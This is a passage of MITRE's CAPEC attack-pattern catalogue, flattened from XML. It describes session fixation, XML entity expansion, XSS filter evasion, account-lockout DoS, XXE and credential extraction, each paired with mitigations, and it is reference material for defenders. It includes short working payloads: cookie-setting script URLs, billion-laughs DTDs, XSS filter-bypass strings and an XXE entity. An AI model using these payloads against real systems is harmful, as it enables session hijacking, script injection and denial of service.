algorithm enough to produce a compatible series or IDs, or just one match. (When IDs are predictable) Monitor logs for unusual multiple connections from a source. Create Session IDs. Attackers craft messages containing their forged credentials in GET, POST request, HTTP headers or cookies. The attacker manipulates the HTTP request message and adds his forged session IDs in to the requests or cookies. env-Web Find that application uses session credentials. env-Web Find that application does not use session credentials. env-Web Victim application accepts attackers' session credentials. Victim application does not accept attackers' session credentials. Detect and alert on users who provide known session IDs in their connection establishment. Since this also fits the scenario where a user's session has expired, the heuristic must be a bit smarter, perhaps looking for an unusually high number of such occurrences in a short time frame. Abuse the Victim's Session Credentials The attacker fixates falsified session ID to the victim when victim access the system. Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the forged session identifier. The attacker loads the predefined or predicted session ID into his browser and browses to protected data or functionality. env-All The attacker loads the predefined or predicted session ID into his software and utilizes functionality with the rights of the victim. env-All The attacker gains access to data or functionality with the rights of the victim. Detect and alert on multiple simultaneous uses of the same session ID from different origins. Apply appropriate input validation to filter all user-controllable input The targeted application must use session credentials to identify legitimate users. Session identifiers that remains unchanged when the privilege levels change. Predictable session identifiers. Medium Medium Injection Time and State This example uses client side scripting to set session ID in the victim's browser. The JavaScript code document.cookie="sessionid=0123456789" fixates a falsified session credential into victim's browser, with the help of crafted a URL link. http://www.example.com/<script>document.cookie="sessionid=0123456789";</script> A similar example uses session ID as an argument of the URL. http://www.example.com/index.php/sessionid=0123456789 Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim's session. Medium Forge the session credential and reply the request. Attackers may require tools to craft messages containing their forged credentials, and ability to send HTTP request to a web application. Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult. Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes. Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism GET or POST data, HTTP header, session cookies Any HTTP Request transport variables (GET, POST, Headers, etc.) Target application's session management mechanism The payload activation impact is that a session identifier of the attackers' choice is considered valid and trust decisions by the application will be based on such a forged identifier. 384 Targeted 361 Secondary 664 Targeted 1000 Attack Pattern CanPrecede 384 In a Session Fixation attack, the attacker provides a credential and coerces a user into using that credential when authenticating with the server. If the format of credentials is anything but trivial, the attacker would need to forge a valid-looking credential first. 1000 Attack Pattern ChildOf 21 http://capec.mitre.org/data/definitions/21.html Penetration High High Low Web Client-Server SOA All All All Thomas Schreiber Session Riding: A Widespread Vulnerability in Today's Web Applications SecureNet GmbH Dec 2004 http://www.securenet.de/papers/Session_Riding.pdf Common Weakness Enumeration (CWE) CWE-384: Session Fixation Draft The MITRE Corporation http://cwe.mitre.org/data/definitions/384.html OWASP Testing Guide Testing for Session Management v4 [DRAFT] The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Testing_for_Session_Management Wendy Jin Cigital, Inc. Pre-review - 0.1 MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Wendy Jin Cigital, Inc. Pre-review - 0.1 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Examples-Instances, Payload_Activation_Impact An attacker submits an XML document to a target application where the XML document uses nested entity expansion to produce an excessively large output XML. XML allows the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory. Survey the target Using a browser or an automated tool, an attacker records all instances of web services to process XML requests. Use an automated tool to record all instances of URLs to process XML requests. env-Web env-ClientServer Use a browser to manually explore the website and analyze how the application processes XML requests. env-Web env-ClientServer The URL processes XML content. env-Web env-ClientServer The application does not seem to accept XML content. env-Web env-ClientServer Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Launch an XML Entity Expansion attack The attacker crafts malicious XML message to force recursive entity expansion (or other repeated processing) that completely uses up available server resource. Send the malicious crafted XML message containing recursive entity uses to the target URL. env-Web env-ClientServer The attacker causes the target application denial of service. Disable altogether the use of inline DTD schemas in your XML parsing objects. The target must receive XML input but either fail to provide an upper limit for entity expansion or provide a limit that is so large that it does not preclude significant resource consumption. Medium High Flooding The most common example of this type of attack is the "many laughs" attack (sometimes called the 'billion laughs' attack). For example: <!DOCTYPE member [ <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;"> <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;"> <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;"> Each entity increases the number entities by a factor of 10. If the above progression were continued to 'z' and 'z' was a simple 10-byte string, the total memory requirement of 'a' in the resulting document would be 10^26 bytes (one-hundred septillion bytes) - well beyond the capabilities of modern computers. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow. Another example of Entity Expansion is Quadratic Blowup attacks. Here the Entity feature is used by the attacker who defines a single huge entity (say, 100KB), and references it many times (say, 30000 times), inside an element that is used by the application (e.g. inside a SOAP string parameter). For example: <?xml version="1.0"?> <!DOCTYPE foobar [<!ENTITY x "AAAAA ... [100KB of them] ... AAAA">]> <root> <hi>&x;&x; ... [30000 of them]... &x;&x;</hi> </root> Low To send recursive entity expansion XML messages. No special resource required. Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion. Implementation: Disable altogether the use of inline DTD schemas in your XML parsing objects. If must use DTD, normalize, filter and white list and parse with methods and routines that will detect entity expansion from untrusted sources. Availability DoS: amplification DoS: resource consumption (CPU) DoS: resource consumption (memory) DoS: resource consumption (other) Denial of Service XML-capable system interfaces Maliciously crafted entity expansion XML message XML inspection, parsing and validation routines Denial of Service 400 Targeted 770 Targeted 1000 Attack Pattern ChildOf 82 http://capec.mitre.org/data/definitions/82.html 333 Category ChildOf 377 http://capec.mitre.org/data/definitions/377.html Exploitation Low Low High SOA All All Amit Klein Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD http://www.securityfocus.com/archive/1/303509 Andre Yee Threat Protection in a Service Oriented World NFR Security http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf Pete Lindstrom Attacking & Defending Web Services SPiRE Security 2002 http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf Elliotte Rusty Harold Tip: Configure SAX parsers for secure processing IBM developerWorks IBM May 27, 2005 http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html Bryan Sullivan XML Denial of Service Attacks and Defenses http://msdn.microsoft.com/en-us/magazine/ee335713.aspx Bryan Sullivan XML Denial of Service Attacks and Defenses November 2009 Issue MSDN Magazine Microsoft 2009 http://msdn.microsoft.com/en-us/magazine/ee335713.aspx Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content MITRE Content Team MITRE 2013-06-21 Updated Comment and Example-Instance_Description Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page. When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the attacker the infected error message error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception. A third party web server which fails to adequately sanitize messages sent in error pages. The victim must be made to execute a query crafted by the attacker which results in the infected error report. Medium None Design: Use libraries and templates that minimize unfiltered input. Implementation: Normalize, filter and white list any input that will be used in error messages. Implementation: The victim should configure the browser to minimize active content from untrusted sources. 79 Targeted 81 Targeted 1000 Attack Pattern ChildOf 18 The attacker uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the "script" tag using the alternate forms of "Script" or "ScRiPt" may bypass filters where "script" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality. Survey the application Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds. Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery. env-Web URL parameters are used by the application or the browser (DOM) env-Web Using URL rewriting, parameters may be part of the URL path. env-Web No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding parameters is created by the attacker. A list of application user interface entry fields is created by the attacker. A list of resources accessed by the application is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Attempt injection payload variations on input parameters Possibly using an automated tool, an attacker requests variations on the inputs he surveyed before. He sends parameters that include variations of payloads. The payloads are designed to bypass incomplete filtering (e.g., incomplete HTML encoding etc.) and tries many variations of characters injection that would enable the XSS payload. He records all the responses from the server that include unmodified versions of his script. Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier. Attempt numerous variations based on form, format, syntax & encoding. env-Web Use a proxy tool to record results of manual input of XSS probes in known URLs. env-Web The output of pages includes some form of a URL parameter. E.g., ?error="File not Found" becomes "File not Found" in the title of the web page env-Web User-controllable input is output back to the browser env-Web Nothing is returned to the web page. The payload may be a stored to be served later. The unique identifier from the probe helps to trace the flow of the possible XSS. env-Web The attacker's script string is being reflected verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, etc.) All context-sensitive characters are consistently re-encoded before being sent to the web browser. For example, in a HTML tag element, the payload may not be able to evade the quotes in order to inject another attribute. Some sensitive characters are consistently encoded, but others are not Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that hackers use. Apply appropriate input validation to filter all user-controllable input of scripting syntax Do not embed user-controllable input generated HTTP headers Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Steal session IDs, credentials, page content, etc. As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker. env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately. env-Web The attacker gets the user's cookies or other session identifiers. The attacker gets the content of the page the user is viewing. The attacker causes the user's browser to visit a page with malicious content. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Forceful browsing When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not). Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities). env-Web The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF. The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Content spoofing By manipulating the content, the attacker targets the information that the user would like to get from the website. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page. env-Web The user sees a page containing wrong information Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Target client software must allow scripting such as JavaScript. High High Injection Protocol Manipulation In this example, the attacker tries to get <script>alert(1)</script> executed by the victim's browser. The target application employs regular expressions to make sure no script is being passed through the application to the web page; such a regular expression could be ((?i)script), and the application would replace all matches by this regex by the empty string. An attacker will then create a special payload to bypass this filter: <scriscriptpt>alert(1)</scscriptript> when the applications gets this input string, it will replace all "script" (case insensitive) by the empty string and the resulting input will be the desired vector by the attacker: <script>alert(1)</script> In this example, we assume that the application needs to write a particular string in a client-side JavaScript context (e.g., <script>HERE</script>). For the attacker to execute the same payload as in the previous example, he would need to send alert(1) if there was no filtering. The application makes use of the following regular expression as filter ((\w+)\s*\(.*\)|alert|eval|function|document) and replaces all matches by the empty string. For example each occurrence of alert(), eval(), foo() or even the string "alert" would be stripped. An attacker will then create a special payload to bypass this filter: this['al' + 'ert'](1) when the applications gets this input string, it won't replace anything and this piece of JavaScript has exactly the same runtime meaning as alert(1). The attacker could also have used non-alphanumeric XSS vectors to bypass the filter; for example, ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_) would be executed by the JavaScript engine like alert(1) is. Low To inject the malicious payload in a web page High To bypass non trivial filters in the application Ability to send HTTP request to a web application. Design: Use browser technologies that do not allow client side scripting. Design: Utilize strict type, character, and encoding enforcement Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification. Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering. Implementation: Perform input validation for all remote content, including remote and user-generated content Implementation: Perform output validation for all remote content. Implementation: Disable scripting languages such as JavaScript in browser Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this. Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism Any HTTP Request transport variables (GET, POST, Headers, etc.) XSS malicious script formed in non-traditional syntax Client web browser where script is executed Client web browser may be used to steal session data, passwords, cookies, and other tokens. 79 Targeted 87 Targeted 85 Targeted 20 Targeted 86 Targeted 692 Targeted 697 Targeted 713 Targeted 71 Targeted 1000 Attack Pattern ChildOf 18 http://capec.mitre.org/data/definitions/18.html 1000 Attack Pattern ChildOf 220 http://capec.mitre.org/data/definitions/220.html Exploitation High High Low Client-Server n-Tier All All All OWASP Cheatsheets XSS Filter Evasion Cheat Sheet The Open Web Application Security Project (OWASP) https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet OWASP Testing Guide Testing for Cross site scripting v2 The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Testing_for_Cross_site_scripting Non-alphanumeric XSS cheat sheet http://sla.ckers.org/forum/read.php?24,28687 WASC Threat Classification 2.0 WASC-08 - Cross Site Scripting The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Cross-Site+Scripting Romain Gaucher Cigital, Inc. Pre-review - 0.2 MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Romain Gaucher Cigital, Inc. Pre-review - 0.2 CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks. Investigate account lockout behavior of system Investigate the security features present in the system that may trigger an account lockout Analyze system documentation to find list of events that could potentially cause account lockout env-Web env-ClientServer env-Local env-Embedded Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly env-Web env-ClientServer env-Local env-Embedded Determine another user's login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out. env-Web env-ClientServer env-Local env-Embedded System provides error message stating that account being attacked is locked out. env-Web env-ClientServer env-Local env-Embedded After a certain number of login attempts with a given user ID, the amount of time it takes for system to respond to further login attempts changes noticeably. env-Web env-ClientServer env-Local env-Embedded System has no automatic signup mechanism, and system provides no indication as to whether the attacker is entering incorrect credentials or the account is locked out during the login process. env-Web env-ClientServer env-Local env-Embedded Attacker determines at least one way to lock out accounts. System provides no indication that account lockouts are possible Repeated failed login attempts in application/system logs. Do not provide any indication to users that their accounts are locked out. Provide a simple error message such as: "Login failed. Try again or contact your administrator" regardless of why a login attempt fails. Obtain list of user accounts to lock out Generate a list of valid user accounts to lock out Obtain list of authorized users using another attack pattern, such as SQL Injection. env-Web env-ClientServer env-Local env-Embedded Attempt to create accounts if possible; system should indicate if a user ID is already taken. env-Web env-ClientServer env-Local env-Embedded Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts. env-Web env-ClientServer env-Local env-Embedded System indicates which user IDs are valid and which are not to unauthenticated users. env-Web env-ClientServer env-Local env-Embedded Attacker gathers list of user IDs Attacker is unable to gather list of valid user IDs; attacker may still be able to lock out accounts by blindly guessing user IDs and performing a lockout procedure with each one. Avoid providing any indication regarding the validity of user IDs upon failed login attempts. Provide a simple error message such as: "Login failed. Try again or contact your administrator" regardless of why a login attempt fails. Lock Out Accounts Perform lockout procedure for all accounts that the attacker wants to lock out. For each user ID to be locked out, perform the lockout procedure discovered in the first step. env-Web env-ClientServer env-Local env-Embedded Success outcome in first step env-Web env-ClientServer env-Local env-Embedded Failure outcome in first step env-Web env-ClientServer env-Local env-Embedded Amount of work required by an attacker to lock out a large number of accounts is at least an order of magnitude smaller than the amount of work required to unlock the accounts thereafter. The large amount of work required by an attacker to lock out a large number of accounts makes this an unattractive attack. The system has a lockout mechanism. An attacker must be able to reproduce behavior that would result in an account being locked. Medium High API Abuse Flooding Brute Force A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction. Low Computer with access to the login portion of the target system Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name. When implementing security features, consider how they can be misused and made to turn on themselves. Availability DoS: resource consumption (other) Denial of Service 400 Secondary 1000 Category ChildOf 212 Eugene Lebanidze Cigital, Inc 2007-02-26 Eugene Lebanidze Cigital, Inc 2007-02-26 Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext. Determine the ciphertext and the encryption algorithm. Perform an exhaustive brute force search of the key space, producing candidate plaintexts and observing if they make sense. Ciphertext is known. Encryption algorithm and key size are known. Low Low Brute Force In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days. Low Brute forcing encryption does not require much skill. A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge). On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext. Obviously as N gets large the brute force approach becomes infeasible. None. This attack happens offline. Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long. In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. Moore's law needs to be taken into account that suggests that computing resources double every eighteen months. Confidentiality Read application data 326 Targeted 327 Targeted 693 Targeted 719 Secondary 1000 Attack Pattern ChildOf 112 Eugene Lebanidze Cigital, Inc 2007-02-26 Eugene Lebanidze Cigital, Inc 2007-02-26 Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description, Resources Required and Context Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description, Resources Required and Context Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description, Resources Required and Context Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description, Resources Required and Context Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Solutions_and_Mitigations An attacker removes or disables filtering mechanisms on the target application. Input filters prevent invalid data from being sent to an application (for example, overly large inputs that might cause a buffer overflow or other malformed inputs that may not be correctly handled by an application). Input filters might also be designed to constrained executable content. For example, if an application accepts scripting languages as input, an input filter could constrain the commands received and block those that the application's administrator deems to be overly powerful. An output filter screens responses from an application or person in order to prevent disclosure of sensitive information. For example, an application's output filter might block output that is sourced to sensitive folders or which contains certain keywords. A data mask is similar to an output filter, but usually applies to structured data, such as found in databases. Data masks elide or replace portions of the information returned from a query in order to protect against the disclosure of sensitive information. If an input filter is removed the attacker will be able to send content to the target and have the target utilize it without it being sanitized. If the content sent by the attacker is executable, the attacker may be able to execute arbitrary commands on the target. If an output filter or data masking mechanism is disabled, the target may send out sensitive information that would otherwise be elided by the filters. If the data mask is disabled, sensitive information stored in a database would be returned unaltered. This could result in the disclosure of sensitive information, such as social security numbers of payment records. This attack is usually executed as part of a larger attack series. The attacker would disable filters and would then mount additional attacks to either insert commands or data or query the target application in ways that would otherwise be prevented by the filters. The target application must utilize some sort of filtering mechanism (input, output, or data masking). Medium No special resources are required. 1000 Attack Pattern ChildOf 56 An attacker creates an XML document that with an external entity reference. External entity references can take the form of <!ENTITY name system "uri"> tags in a DTD. Because processors may not validate documents with external entities, there may be no checks on the nature of the reference in the external entity. This can allow an attacker to open arbitrary files or connections. For example, the following DTD would attempt to open the /dev/tty device: <!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///dev/tty"> ]> The target must follow external entity references without validating the validity of the reference target. Medium The attacker must be able to trick the target into loading an XML document with crafted external entity reference. Configure the XML processor to only retrieve external entities from trusted sources. CVE-2008-0628 The XML parsing code in Sun Java Runtime Environment JDK and JRE 6 Update 3 and earlier processes external entity references even when the "external general entities" property is false, which allows remote attackers to conduct XML external entity (XXE) attacks and cause a denial of service or access restricted resources. 1000 Attack Pattern ChildOf 278 XXE (Xml eXternal Entity) Attack Beyond Security http://www.securiteam.com/securitynews/6D0100A5PU.html CESA-2007-002 - rev 2: Sun JDK6 breaks XXE attack protection http://scary.beasts.org/security/CESA-2007-002.html An attacker creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures. For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an attacker can take advantage of these assumptions to abuse service functionality. For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the attacker uses a malicious client, however, the attacker could ignore the server input and declare any total price. Likewise, an attacker could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an attacker can exploit. This attack differs from most other forms of identity spoofing in that the attacker is not attempting to impersonate a specific user or device. Instead, the attacker attempts to impersonate a class of applications, namely the client applications of a service. As such, the attacker is not violating the service's trust in an identity, but its trust in expected behavior. The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an attacker. Medium The attacker must be able to reverse engineer a client of the targeted service. However, the attacker does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality. 602 Targeted 1000 Attack Pattern ChildOf 151 1000 Attack Pattern ChildOf 22 An attacker manipulates the registry values used by an application to perform a variety of possible attacks. Many applications utilize registries to store configuration and service information. As such, attacks that manipulate these registries can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of the targeted application. It is important to note that "registry" does not only refer to the Microsoft Windows Registry, but to any registry used by an application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes undertaken as part of another attack; for example, a path traversal (inserting relative path modifiers) or buffer overflow (enlarging a registry value beyond an application's ability to store it), but given the long term usage of many registry values, the registry manipulation could be its own end. The targeted application must rely on values stored in a registry. Medium No special resources are required. 1000 Attack Pattern ChildOf 176 An attacker examines a target application's cache for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information. The target application must store sensitive information in a cache. The cache must be inadequately protected against attacker access. Medium The attacker must be able to reach the target application's cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file. 311 Targeted 1000 Attack Pattern ChildOf 37 An attacker examines a target application's code or configuration files to find credential or key material that has been embedded within the application or its files. Many services require authentication with their users for the various purposes including billing, access control or attribution. Some client applications store the user's authentication credentials or keys to accelerate the login process. Some clients may have built-in keys or credentials (in which case the server is authenticating with the client, rather than the user). If the attacker is able to locate where this information is stored, they may be able to retrieve these credentials. The attacker could then use these stolen credentials to impersonate the user or client, respectively, in interactions with the service or use stolen keys to eavesdrop on nominally secure communications between the client and server. Identify Target Attacker identifies client components to extract information from. These may be configuration files, local databases, binary executables, class files, shared libraries (e.g., DLLs), or other machine code. Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats. env-Local env-Embedded env-ClientServer env-Peer2Peer Package listing. The attacker uses a package manifest provided with the software installer, or the file system itself, to identify component files suitable for attack. env-Local env-Embedded env-ClientServer env-Peer2Peer Proprietary or sensitive data is stored in a location ultimately distributed to end users. env-Local env-Embedded env-ClientServer env-Peer2Peer No sensitive data seems to be stored in the user's client. The storage could be done after the first authentication or execution of the thick client. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Access to binary code is not realistic. For example, in a client-server environment, binary code on the server is presumed to be inscrutable to an attacker unless another vulnerability exposes it. env-Web env-ClientServer env-Peer2Peer env-CommProtocol The attacker identifies one or more files or data in the software that might store credentials information. Obfuscation, anti-debugging, packing can make the observation and reverse engineering more difficult. It is only capable of delaying an attacker, however, not preventing a sufficiently motivated and resourced one. Apply mining techniques The attacker then uses a variety of techniques, such as monitoring, sniffing, reverse-engineering, cryptanalysis to extract the sensitive information and its associated use by the application. API Profiling. The attacker monitors the software's use of registry keys or other storage locations that can contain sensitive information. env-Local env-Embedded env-ClientServer env-Peer2Peer Execution in debugger. The attacker attaches a debugger to the application to monitor authentication process and retrieve important application steps (reverse 